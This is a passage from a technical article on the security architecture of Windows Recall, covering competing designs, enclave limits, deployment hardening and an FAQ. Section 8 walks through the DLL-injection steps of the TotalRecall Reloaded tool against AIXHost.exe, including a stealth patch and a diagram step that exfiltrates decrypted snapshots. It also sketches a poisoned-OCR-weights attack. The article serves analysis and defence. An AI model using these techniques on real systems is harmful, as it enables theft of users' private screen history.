&lt;p&gt;End users encounter Recall through a small number of touchpoints documented in the Insider preview blog [@rec-04] and the developer integration page [@rec-09]. The keyboard shortcut Win+J launches the Recall UI. The Out-Of-Box Experience asks the user to opt in to saving snapshots and to enrol Windows Hello before any capture begins. The per-app exclusion list is reachable from Settings. Storage allocation defaults are configurable, with a documented audit path through the &lt;em&gt;Manage Recall&lt;/em&gt; policy reference.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On a managed-device pilot, deploy the &lt;code&gt;AllowRecallEnablement&lt;/code&gt; Intune policy &lt;em&gt;before&lt;/em&gt; the OOBE flow begins on the device. If the policy lands after the user has completed OOBE, you leave a small window in which the user could opt in under the consumer default. Pre-deploying the policy makes the managed-device default (Recall disabled) authoritative from first boot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Recall is the on-device-only Copilot+ feature, on a defined silicon set, with a defined management surface. Who else ships in this space, and how do their architectures compare?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches Under the Same UX Label&lt;/h2&gt;
&lt;p&gt;Three other architectures ship a search-your-past-screen or near-adjacent UX in the 2024-2026 window. Each made a different choice about where the trust boundary lives.&lt;/p&gt;
&lt;h3&gt;Rewind.ai (macOS, 2022 to present)&lt;/h3&gt;
&lt;p&gt;Rewind.ai is the closest architectural predecessor to the May 2024 Recall design. It captures the user&apos;s macOS screen, OCRs the captures, and stores them locally in an SQLCipher-encrypted SQLite database, with the database key held in the macOS Keychain [@rec-28] [@rec-29] [@rec-30]. There is no per-query biometric prompt; there is no Secure Enclave gating on each access. Architecturally, Rewind relies on macOS sandboxing and FileVault for the surrounding protection.The vendor security page at rewind.ai/security resolves to a domain-parking template as of May 2026, so this architectural description is &lt;em&gt;INFERRED_DETAIL&lt;/em&gt; drawn from the Nudge Security third-party profile [@rec-28] and the SQLCipher canonical pages [@rec-29] [@rec-30] rather than a vendor-published spec.&lt;/p&gt;
&lt;p&gt;SQLCipher uses AES-256-CBC per page with a per-page random IV and HMAC-SHA512, deriving the key from a passphrase via PBKDF2-HMAC-SHA512 with 256,000 default iterations [@rec-30]. That is reasonable file-encryption; it is &lt;em&gt;not&lt;/em&gt; per-access authentication. A same-user process that can read the SQLCipher key out of Keychain has plaintext access to every screen capture the user has ever taken -- structurally the same condition that broke the May 2024 Recall design, on a different operating system with a different sandbox model.&lt;/p&gt;
&lt;h3&gt;Apple Intelligence Personal Context + Private Cloud Compute (2024 to present)&lt;/h3&gt;
&lt;p&gt;Apple&apos;s Personal Context personalisation is &lt;em&gt;not&lt;/em&gt; a search-your-past-screen product. It is structured-app-data personalisation: messages, mail, calendar, photo metadata, and similar surfaces. The on-device tier runs in the Apple Silicon Secure Enclave. The off-device tier -- &lt;em&gt;Private Cloud Compute&lt;/em&gt; -- carries a binary-transparency-style commitment that the cloud nodes process personal data only inside a hardened OS image whose source code Apple publishes for outside review [@rec-27]. The PCC architecture is included in this comparison not because it is a Recall analogue (it isn&apos;t), but because it shows what Apple has chosen to ship at the adjacent problem class: structured data personalisation, not screen-history.&lt;/p&gt;
&lt;h3&gt;Consumer cloud-capture devices (Limitless, Plaud, and similar)&lt;/h3&gt;
&lt;p&gt;Consumer cloud-capture devices invert the trust model. The capture happens on a dedicated wearable or microphone; the processing happens on a vendor&apos;s cloud tier; the storage lives in the vendor&apos;s account model with end-to-end encrypted upload and vendor-side AES-256-GCM at rest. This is architecturally the opposite of Recall: on-device-only is replaced by on-vendor-cloud, and the trust boundary is at the vendor&apos;s perimeter rather than at the user&apos;s silicon. The internals of any specific vendor&apos;s stack are not in the scope-mandated source set; the entry exists to establish the &lt;em&gt;existence&lt;/em&gt; of the cloud-tier alternative, not to certify any specific vendor&apos;s claim.&lt;/p&gt;
&lt;h3&gt;The eight-dimension matrix&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Architecture&lt;/th&gt;
&lt;th&gt;On-device only&lt;/th&gt;
&lt;th&gt;Hardware-rooted master&lt;/th&gt;
&lt;th&gt;TEE-isolated compute&lt;/th&gt;
&lt;th&gt;Per-access biometric&lt;/th&gt;
&lt;th&gt;Pre-persistence filter&lt;/th&gt;
&lt;th&gt;TEE-isolated UI plane&lt;/th&gt;
&lt;th&gt;KDF/nonce documented&lt;/th&gt;
&lt;th&gt;CVE record&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Recall Gen 1&lt;/strong&gt; (May 2024, did not ship)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;Pre-release&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Recall Gen 3+4&lt;/strong&gt; (Sept 2024 - May 2026)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes (TPM 2.0, Pluton where available)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes (VBS Enclave)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes (Hello ESS)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes (Purview EDM)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No (UI explicitly untrusted)&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;No CVE through May 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rewind.ai (macOS)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Keychain-rooted&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple Personal Context + PCC&lt;/td&gt;
&lt;td&gt;Hybrid&lt;/td&gt;
&lt;td&gt;Yes (Secure Enclave)&lt;/td&gt;
&lt;td&gt;Yes (Secure Enclave / PCC)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Apple-managed&lt;/td&gt;
&lt;td&gt;Apple-managed&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consumer cloud-capture&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Vendor cloud&lt;/td&gt;
&lt;td&gt;Vendor cloud&lt;/td&gt;
&lt;td&gt;Vendor flow&lt;/td&gt;
&lt;td&gt;Vendor flow&lt;/td&gt;
&lt;td&gt;Vendor flow&lt;/td&gt;
&lt;td&gt;Not public&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SQL Server 2019 AE w/ enclaves&lt;/td&gt;
&lt;td&gt;Server-side&lt;/td&gt;
&lt;td&gt;Yes (TPM-attested)&lt;/td&gt;
&lt;td&gt;Yes (VBS Enclave)&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;Yes (documented)&lt;/td&gt;
&lt;td&gt;Patched as needed&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Recall Generation 3+4 is the only design in the surveyed set that checks five of the six &quot;ideal&quot; properties: on-device-only data flow, hardware-rooted master key, TEE-isolated sensitive compute, per-access biometric authentication, and pre-persistence sensitive-content filtering. The sixth ideal property -- TEE-isolated plaintext delivery to the UI plane -- is the architectural seam §8 explores.&lt;/p&gt;

flowchart LR
    A[&quot;On-device only&lt;br /&gt;YES&quot;]
    B[&quot;Hardware-rooted master&lt;br /&gt;YES&quot;]
    C[&quot;TEE-isolated compute&lt;br /&gt;YES&quot;]
    D[&quot;Per-access biometric&lt;br /&gt;YES&quot;]
    E[&quot;Pre-persistence filter&lt;br /&gt;YES&quot;]
    F[&quot;TEE-isolated UI plane&lt;br /&gt;NO -- UI is explicitly untrusted&quot;]
    A --&amp;gt; G((Recall Gen 3+4))
    B --&amp;gt; G
    C --&amp;gt; G
    D --&amp;gt; G
    E --&amp;gt; G
    F -. &quot;the seam&quot; .-&amp;gt; G
&lt;p&gt;Five of six properties. What does the missing sixth cost?&lt;/p&gt;
&lt;h2&gt;8. What the VBS Enclave Model Cannot Do&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s September 27, 2024 architecture is the strongest design Windows has shipped for an on-device personal-context store. It is not the strongest design that is theoretically possible -- and it is honest about which classes of attack it does not address. Here are five.&lt;/p&gt;
&lt;h3&gt;8.1 The UI host runs outside the enclave&lt;/h3&gt;
&lt;p&gt;This is the load-bearing limit. Davuluri&apos;s blog states it directly: &quot;Recall components such as the Recall UI operate outside the VBS Enclaves and are untrusted in this architecture&quot; [@rec-03]. The architecture diagram labels the UI box untrusted. The blog says this in September 2024, eighteen months before anyone publishes an exploit for it. The seam is documented.&lt;/p&gt;
&lt;p&gt;In April 2026, Alexander Hagenah released TotalRecall Reloaded against the Generation 3+4 design [@rec-12]. The tool has two files: &lt;code&gt;totalrecall.exe&lt;/code&gt;, an injector, and &lt;code&gt;totalrecall_payload.dll&lt;/code&gt;, the payload. The injector locates the &lt;code&gt;AIXHost.exe&lt;/code&gt; UI host via &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;, allocates memory in the target with &lt;code&gt;VirtualAllocEx&lt;/code&gt;, writes the path of the payload DLL with &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and spawns a remote thread pointing at &lt;code&gt;LoadLibraryW&lt;/code&gt;. Once loaded, the payload reads decrypted Recall data out of the &lt;code&gt;AIXHost.exe&lt;/code&gt; address space, where the enclave has just delivered it after the user&apos;s legitimate Hello authentication [@rec-12] [@rec-22].&lt;/p&gt;
&lt;p&gt;Hagenah&apos;s verbatim characterisation, from the README: &quot;&lt;strong&gt;No admin required. Standard user. No kernel exploit. No crypto bypass. Just COM calls.&lt;/strong&gt;&quot; [@rec-12]. The tool ships three execution modes -- &lt;code&gt;--launch&lt;/code&gt; (start AIXHost.exe and inject), &lt;code&gt;--stealth&lt;/code&gt; (operate without UI signals), and &lt;code&gt;--wait&lt;/code&gt; (attach to a future legitimate AIXHost.exe instance) [@rec-12]. The &lt;code&gt;--stealth&lt;/code&gt; mode patches a function called &lt;code&gt;DiscardDataAccess&lt;/code&gt; inside a DLL referred to as Baker.dll, which would otherwise discard the decrypted snapshot data on UI dismissal.The Baker.dll &lt;code&gt;DiscardDataAccess&lt;/code&gt; patch is a reverse-engineering detail rather than a load-bearing architectural point, but it illustrates the surface area available to an injected payload inside the UI host&apos;s address space. Anything the UI process can do to a memory region, an injected DLL can do too.&lt;/p&gt;

The vault is solid. The delivery truck is not. -- Alexander Hagenah, TotalRecall Reloaded README, April 2026 [@rec-12]
&lt;p&gt;The disclosure timeline is in the public record. Hagenah submitted a full disclosure to the Microsoft Security Response Center on March 6, 2026, including source code and build instructions [@rec-23]. Microsoft opened a case nine days later and closed it on April 3, 2026 with the determination that the behaviour &quot;operates within the current, documented security design of Recall&quot; [@rec-23]. The public release of the tool followed.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Per iTnews&apos;s coverage of the disclosure, Microsoft&apos;s MSRC response after a month of review was that the demonstrated behaviour &quot;operates within the current, documented security design of Recall&quot; [@rec-23]. The phrasing is precise. The September 27, 2024 architecture blog [@rec-03] &lt;em&gt;publishes&lt;/em&gt; that the UI host is outside the enclave; the MSRC servicing criteria [@rec-11] &lt;em&gt;publish&lt;/em&gt; that same-user post-authentication code is not a security boundary. Hagenah demonstrated what &quot;untrusted in this architecture&quot; means in practice; MSRC confirmed the demonstration is consistent with the published model. Reasonable readers may disagree on whether the published model is the right model; the present article does not take a side and leaves that judgment to the reader.&lt;/p&gt;
&lt;/blockquote&gt;

sequenceDiagram
    participant User
    participant Inj as totalrecall.exe (standard user)
    participant AIX as AIXHost.exe (UI host, VTL0)
    participant Hello as Hello ESS / VBS Enclave
    participant Pay as totalrecall_payload.dll
    User-&amp;gt;&amp;gt;AIX: Win+J launches Recall UI
    AIX-&amp;gt;&amp;gt;Hello: request snapshot data
    User-&amp;gt;&amp;gt;Hello: present biometric
    Hello-&amp;gt;&amp;gt;AIX: deliver decrypted snapshot to address space
    Inj-&amp;gt;&amp;gt;AIX: CreateToolhelp32Snapshot, locate process
    Inj-&amp;gt;&amp;gt;AIX: VirtualAllocEx, write payload path
    Inj-&amp;gt;&amp;gt;AIX: WriteProcessMemory with payload DLL path
    Inj-&amp;gt;&amp;gt;AIX: CreateRemoteThread targeting LoadLibraryW
    AIX-&amp;gt;&amp;gt;Pay: LoadLibraryW loads the payload DLL
    Pay-&amp;gt;&amp;gt;AIX: read decrypted data from same address space
    Pay--&amp;gt;&amp;gt;Inj: exfiltrate plaintext snapshots

AppContainer is the Windows process-isolation primitive that restricts a process&apos;s access to filesystem, registry, network, and inter-process surfaces to an explicit capability list declared at process launch. Universal Windows Platform applications and modern packaged applications launch inside an AppContainer by default; the kernel enforces the capability set on every access to a securable object. A Generation 6 Recall UI launched inside an AppContainer would not be able to load arbitrary user-supplied DLLs into its address space, because the AppContainer&apos;s capability set would not include the broad inter-process token-and-memory-access capabilities that Hagenah&apos;s injector relies on (`OpenProcess` for `PROCESS_VM_WRITE` and `PROCESS_CREATE_THREAD` against an out-of-container target are gated by the AppContainer&apos;s integrity level and capability set).
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Generation 3 cryptographic chain holds -- as §5 established, a process with full filesystem access, a kernel-mode caller, and an administrator all read only ciphertext. The architectural seam is at the plaintext-delivery boundary -- the UI host, by Microsoft&apos;s own published architecture, is explicitly outside the enclave. Closing this seam would require a Generation 6 design that combines a high-signer Protected Process Light for the UI host, AppContainer with capability-restricted code-loading, and WDAC-enforced code integrity for the UI process tree. No such Microsoft commitment exists as of May 2026.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The deeper observation is one of recurrence. The Generation 1 failure was &quot;same-user code is in the user&apos;s trust boundary, and the architecture relied on a filesystem ACL rather than per-access authentication.&quot; The Generation 5 disclosure is &quot;same-user code is in the user&apos;s trust boundary, and the architecture relied on the UI host being a normal user-mode process.&quot; Different layer; same threat-model limit, restated.&lt;/p&gt;
&lt;h3&gt;8.2 Rubber-hose against an authenticated user&lt;/h3&gt;
&lt;p&gt;No per-access authentication scheme can defeat a coerced legitimate user. If the user is physically compelled to authenticate with Hello and then operate the UI, the architecture authorises a release into the UI plane that the coercer can read off the screen, off a screenshot, or off a redirected output device. The September 27 design explicitly does not address this threat class, and no plausible Generation N design within the same UX category can. The control here is procedural -- duress codes, panic gestures, or a separate &quot;do not authorise&quot; PIN -- rather than cryptographic.&lt;/p&gt;
&lt;h3&gt;8.3 NPU and GPU side channels&lt;/h3&gt;
&lt;p&gt;The VBS Enclave is the trust boundary for CPU-side computation. The Neural Processing Unit that drives Recall&apos;s semantic embedding is &lt;em&gt;not&lt;/em&gt; in the enclave; neither is the integrated GPU. Side-channel attacks on AI accelerator memory hierarchies are unstudied territory in the published Copilot+ PC literature as of May 2026. There is no public proof of a Recall-specific NPU side channel; there is also no published assurance that one does not exist. This is &quot;unknown unknown&quot; territory, which is honest to state and dangerous to pretend has been ruled out.&lt;/p&gt;
&lt;h3&gt;8.4 OCR model integrity&lt;/h3&gt;
&lt;p&gt;The local OCR model loads from disk; the code inside the enclave reads and uses the weights. Microsoft has not publicly committed to a signed-weights verification step for the OCR model at enclave load. An attacker with administrator access could in principle substitute poisoned weights -- weights that deliberately mis-OCR specific credential formats so that the Purview EDM filter does not catch them, thereby smuggling sensitive plaintext through the filter and into the persistent store. Admin compromise is an out-of-scope class per the MSRC servicing criteria [@rec-11], but the OCR-integrity story would be more legible if the enclave verified a signature on the model file at load time.&lt;/p&gt;
&lt;h3&gt;8.5 Substrate compromise&lt;/h3&gt;
&lt;p&gt;A Secure Boot bypass, a Secure Kernel vulnerability, or a hypervisor escape takes down VBS itself, not Recall specifically. Saar Amar and Daniel King&apos;s Black Hat USA 2020 &lt;em&gt;Breaking VSM by Attacking SecureKernel&lt;/em&gt; [@rec-32] remains the canonical historical treatment of the SK attack surface; the substrate has been hardened in response and is not &lt;em&gt;proven secure&lt;/em&gt;. Recall inherits whatever the substrate&apos;s residual risk is in any given month. Patching is by way of the normal Windows servicing cadence.&lt;/p&gt;
&lt;p&gt;Microsoft, by its own published servicing criteria, accepts each of these limits as architectural choices, not defects. What does the public record &lt;em&gt;not&lt;/em&gt; tell us, that an independent reviewer would need to know?&lt;/p&gt;
&lt;h2&gt;9. Where the Public Record Runs Out&lt;/h2&gt;
&lt;p&gt;Five things the September 27 blog does not say, and one structural question it raises that the next five years of Windows shell features will answer.&lt;/p&gt;
&lt;h3&gt;9.1 The KDF and nonce scheme are not public&lt;/h3&gt;
&lt;p&gt;Davuluri&apos;s blog [@rec-03] specifies that each snapshot is encrypted with a per-snapshot key derived from a TPM-sealed master, and that the AEAD primitive is AES-256-GCM. It does not publish the key derivation function, the per-snapshot nonce derivation, or the associated-data inputs to GCM. The §5 pseudocode is a structural reconstruction; the literal source is in &lt;code&gt;aeon.dll&lt;/code&gt; (or equivalent) and is not documented. The practical consequence is that third-party formal cryptographic review of the per-snapshot construction is foreclosed. MORSE&apos;s internal penetration test and the unnamed third-party security vendor&apos;s review [@rec-03] were performed against the literal implementation; both reports are non-public.&lt;/p&gt;
&lt;h3&gt;9.2 On-device OCR model integrity&lt;/h3&gt;
&lt;p&gt;The OCR model loads from disk and runs inside the enclave. There is no public Microsoft commitment that the enclave verifies a signature on the model weights at load time. The §8 OCR-integrity attack -- admin substitutes poisoned weights to defeat Purview EDM -- is bounded by the admin-is-out-of-scope MSRC policy [@rec-11], but a verified-load step would tighten the story.&lt;/p&gt;
&lt;h3&gt;9.3 InPrivate / password-field pause signal forgery&lt;/h3&gt;
&lt;p&gt;Davuluri&apos;s blog mentions that Recall pauses snapshot capture during InPrivate browsing and in password fields [@rec-03]. The signalling API by which the browser or the credential UI tells the Snapshot Service to pause is not fully documented. Whether a malicious browser extension can suppress legitimate pauses (forcing a snapshot of an InPrivate page) or spuriously trigger them (denial-of-service against legitimate snapshot capture) is unstudied in the public record.&lt;/p&gt;
&lt;h3&gt;9.4 The authorisation-window timeout is not exposed by policy&lt;/h3&gt;
&lt;p&gt;The Intune ADMX template documented in &lt;em&gt;Manage Recall&lt;/em&gt; [@rec-08] exposes &lt;code&gt;AllowRecallEnablement&lt;/code&gt;, &lt;code&gt;DisableAIDataAnalysis&lt;/code&gt;, snapshot retention, storage allocation, and the per-app exclusion list. It does not, as of May 2026, expose the authorisation-window timeout as a configurable policy. An enterprise that wants to require re-authentication every N minutes during a Recall session does not have a Microsoft-supported knob for it.&lt;/p&gt;
&lt;h3&gt;9.5 The pattern question&lt;/h3&gt;
&lt;p&gt;This is the structural one. Microsoft has now shipped a VBS-enclave-backed feature in the desktop shell &lt;em&gt;and&lt;/em&gt; has open-sourced the developer-facing SDK at &lt;code&gt;microsoft/VbsEnclaveTooling&lt;/code&gt; [@rec-31]. The repository ships a code generator and a NuGet SDK, requires Windows 11 24H2 Build 26100.3916 or later, and supports C++17 and C++20 in the host with C++20 and Rust 1.88+ in the enclave [@rec-31].The SDK lowers the barrier to building a VBS Enclave dramatically. A developer who wants to put a small piece of sensitive computation (credential handling, secrets storage, on-device LLM context) inside an enclave no longer has to reverse-engineer Recall&apos;s implementation; they can write against a documented API.&lt;/p&gt;
&lt;p&gt;The forward question is whether other desktop-shell features adopt the same pattern. Encrypted clipboard history, encrypted recent-files, on-device LLM context windows, the password manager Edge currently keeps in user-mode RAM -- each is a candidate. Hagenah&apos;s &lt;code&gt;AIXHost.exe&lt;/code&gt; class suggests the pattern, naively applied, repeats the same UI-host weakness for every consumer. A VBS-Enclave-backed clipboard with a normal user-mode UI host inherits the same seam.&lt;/p&gt;

Microsoft&apos;s internal Offensive Research and Security Engineering team ran a penetration test against the Generation 3 architecture before the September 27 announcement [@rec-03]. An unnamed third-party security vendor performed an independent review. Neither report is public. The September 27 blog cites their existence to establish that adversarial review happened; it does not cite findings, methodology, or scope. This is not a criticism so much as a public-trust framing: the residual confidence a reader can place in the architecture is gated on the credibility of two reports they cannot read. Hagenah&apos;s April 2026 disclosure is the first publicly verifiable adversarial review of the UI surface; it found exactly what the architecture diagram already warned about. That coincidence is reassuring about the *honesty* of the published model; it does not by itself certify any property the published model does not cover.
&lt;p&gt;Microsoft is not going to fix the AIXHost.exe class in 2026. What can a Copilot+ PC operator actually &lt;em&gt;do&lt;/em&gt; with the shipping Recall today?&lt;/p&gt;
&lt;h2&gt;10. Deploying Recall Safely&lt;/h2&gt;
&lt;p&gt;Six knobs, in order. Setting them in this order turns the September 2024 architecture into a deployable enterprise posture.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Procurement.&lt;/strong&gt; Pluton-or-discrete-TPM-2.0 hardware plus ESS-capable biometric sensor (IR camera plus presence sensor, or equivalent). Without ESS-capable biometrics, the Hello-gated architecture degrades to a PIN or password fallback, which is weaker than the architecture intends [@rec-25] [@rec-24].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Policy enablement.&lt;/strong&gt; Deploy the Intune &lt;code&gt;AllowRecallEnablement&lt;/code&gt; policy explicitly. The Microsoft Learn &lt;em&gt;Manage Recall&lt;/em&gt; page states that &quot;By default, Recall is disabled and removed on managed devices&quot; [@rec-08]; the consumer OOBE default is opt-in but applies only to unmanaged devices. The managed-device default is authoritative once policy is in force, so deploy first, then provision.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Data minimisation.&lt;/strong&gt; Deploy the snapshot-retention and disk-allocation policies from the &lt;em&gt;Manage Recall&lt;/em&gt; policy reference [@rec-08]. Fewer snapshots and shorter retention reduce the maximum size of any single exfiltration window.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Sensitive-app exclusion.&lt;/strong&gt; Enable the Microsoft Purview Endpoint DLP integration for window-level snapshot exclusion of any application handling regulated data (PHI, PCI, PII), and populate the per-app exclusion list with the local password manager, the corporate VPN client, and any other surfaces with high-value secrets [@rec-08]. This is the operator-controlled complement to the in-enclave Purview EDM content filter.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Defence-in-depth for the AIXHost.exe class.&lt;/strong&gt; Deploy Smart App Control plus a &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Windows Defender Application Control (WDAC)&lt;/a&gt; policy to deny untrusted DLL loading on the device. DLL injection requires a process to load the payload; a WDAC policy with User-Mode Code Integrity (UMCI) enabled blocks the load of any DLL -- including Hagenah&apos;s payload -- that does not match a signer or hash allow-list in the policy. The &lt;code&gt;LoadLibraryW&lt;/code&gt; call still executes; the load fails because the code-integrity check rejects the unsigned payload. None of these are &lt;em&gt;in&lt;/em&gt; the Recall architecture; they are platform-level controls the operator must enable.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Audit and monitoring.&lt;/strong&gt; Existing InfoStealer behaviour rules in Microsoft Defender for Endpoint will flag bulk reads of the Recall directory as high-confidence indicators. The point worth being precise about here: these are the &lt;em&gt;pre-existing&lt;/em&gt; InfoStealer behaviour rules, not a Recall-specific signature; they fire on the access pattern (rapid enumeration of a personal-data directory) rather than on the file format. Configure Defender and your SIEM to alert on the directory.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A tempting deployment &quot;fix&quot; is to disable VBS entirely as a way to prevent the Snapshot Service from running. This is a net security regression. VBS is the substrate for Credential Guard, HVCI, the Hello ESS algorithm isolation, and the Recall enclave itself. Disabling VBS eliminates the protection the Generation 3 architecture provides while leaving the desktop attack surface open. If the goal is to prevent Recall from running, use &lt;code&gt;AllowRecallEnablement&lt;/code&gt; or &lt;code&gt;DisableAIDataAnalysis&lt;/code&gt; instead.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The list of things &lt;em&gt;not&lt;/em&gt; to bother doing: manual AES-256-GCM on the SQLite file (the enclave already does this); manual scrubbing of the Recall directory on a schedule (the retention policy already does this); writing a custom Defender signature for the Recall directory (existing InfoStealer behaviour rules already cover the access pattern); relying on the OOBE opt-in default for an enterprise pilot (that default applies to unmanaged devices only).&lt;/p&gt;
&lt;p&gt;{`
// Conceptual audit. The real script needs PowerShell on Windows;
// this is the logic an operator&apos;s audit cmdlet would implement.&lt;/p&gt;
&lt;p&gt;type DevicePosture = {
  pluton_present: boolean;
  tpm_2_0_present: boolean;
  hello_ess_enrolled: boolean;
  smart_app_control: &quot;on&quot; | &quot;off&quot; | &quot;evaluation&quot;;
  wdac_policy: &quot;enforced&quot; | &quot;audit&quot; | &quot;none&quot;;
  allow_recall_enablement: &quot;allowed&quot; | &quot;disabled&quot; | &quot;not-set&quot;;
  retention_days: number;
  defender_directory_alert: boolean;
};&lt;/p&gt;
&lt;p&gt;function auditRecallPosture(d: DevicePosture): string[] {
  const findings: string[] = [];&lt;/p&gt;
&lt;p&gt;  if (!d.tpm_2_0_present) findings.push(&quot;FAIL: no TPM 2.0; sealing path unavailable.&quot;);
  if (!d.pluton_present)
    findings.push(&quot;INFO: discrete TPM 2.0; bus-sniffing residual risk.&quot;);
  if (!d.hello_ess_enrolled)
    findings.push(&quot;FAIL: Hello ESS not enrolled; per-access biometric degraded to PIN.&quot;);
  if (d.smart_app_control === &quot;off&quot;)
    findings.push(&quot;WARN: Smart App Control off; AIXHost.exe injection class wide open.&quot;);
  if (d.wdac_policy !== &quot;enforced&quot;)
    findings.push(&quot;WARN: WDAC not in enforcement mode; LoadLibraryW gating absent.&quot;);
  if (d.allow_recall_enablement === &quot;not-set&quot;)
    findings.push(&quot;WARN: AllowRecallEnablement not set; OOBE default may apply.&quot;);
  if (d.retention_days &amp;gt; 30)
    findings.push(&quot;INFO: retention &amp;gt;30 days; consider tightening for high-risk roles.&quot;);
  if (!d.defender_directory_alert)
    findings.push(&quot;WARN: Defender directory-enumeration alert not configured.&quot;);&lt;/p&gt;
&lt;p&gt;  return findings.length ? findings : [&quot;OK: posture matches Gen 3+4 deployment guide.&quot;];
}
`}&lt;/p&gt;
&lt;p&gt;If you have gotten this far, you have the questions a reader walks in with answered. Here are the questions a reader walks out with.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. The September 27, 2024 architecture blog [@rec-03] and the IT-admin *Manage Recall* documentation [@rec-08] both state that snapshots, OCR text, and the semantic index are processed and stored entirely on-device. The Microsoft Diagnostic Data telemetry pipeline does not carry snapshot data. This is the one property the original May 2024 design got right, and it survived the re-architecture intact.

No. Session-replay tools record interactive sessions for product analytics and ship the recording to a vendor cloud. Screen recording for accessibility (e.g., screen readers, magnification) operates on the live frame and does not persist a corpus. Compliance archiving (e.g., legal-hold mailbox archives) is a server-side, vendor-managed retention surface. Recall is on-device, personal, search-indexed over OCR text and embeddings, and gated on Hello biometric. The architectural lineage and the threat model differ for each.

Yes, on a discrete TPM 2.0 SKU. The Microsoft Pluton chipset list [@rec-24] enumerates the Pluton-equipped silicon; Copilot+ PCs that are not on that list satisfy the Recall hardware requirements via a discrete TPM 2.0. The trade-off is the bus-sniffing surface discussed in §6: a Pluton-integrated TPM has no off-die bus to sniff for the security-processor traffic. The architectural correctness of the September 27 design does not depend on the choice; only the bus-sniffing residual risk does.

Different threat models. BitLocker&apos;s threat model is offline disk theft: an adversary with the powered-off laptop in hand. The May 2024 Recall design borrowed BitLocker&apos;s &quot;data at rest is encrypted&quot; framing without absorbing that the dominant Recall adversary is a logged-on session adversary (an InfoStealer running as the user), against which BitLocker has nothing to say. Microsoft did not delay BitLocker because the original 2007 BitLocker matched the threat model it claimed to address; they delayed Recall because the original 2024 Recall did not.

No, as of May 2026. The Hagenah AIXHost.exe class disclosed in April 2026 [@rec-12] [@rec-22] [@rec-23] was reported to MSRC on March 6, 2026; Microsoft closed the case on April 3, 2026 with the determination that the behaviour &quot;operates within the current, documented security design of Recall&quot; [@rec-23]. That determination is consistent with the published MSRC servicing criteria [@rec-11], which do not list same-user post-authentication as a security boundary. No CVE was assigned.

No. The on-device NPU is required for the semantic-embedding step, and the Copilot+ hardware baseline (Pluton or discrete TPM 2.0 plus an NPU at a minimum throughput tier plus an ESS-capable biometric sensor) is a hard prerequisite [@rec-09] [@rec-04]. There is no CPU-only fallback for the embedding pipeline, and the on-device-only data flow forecloses a cloud fallback by design.

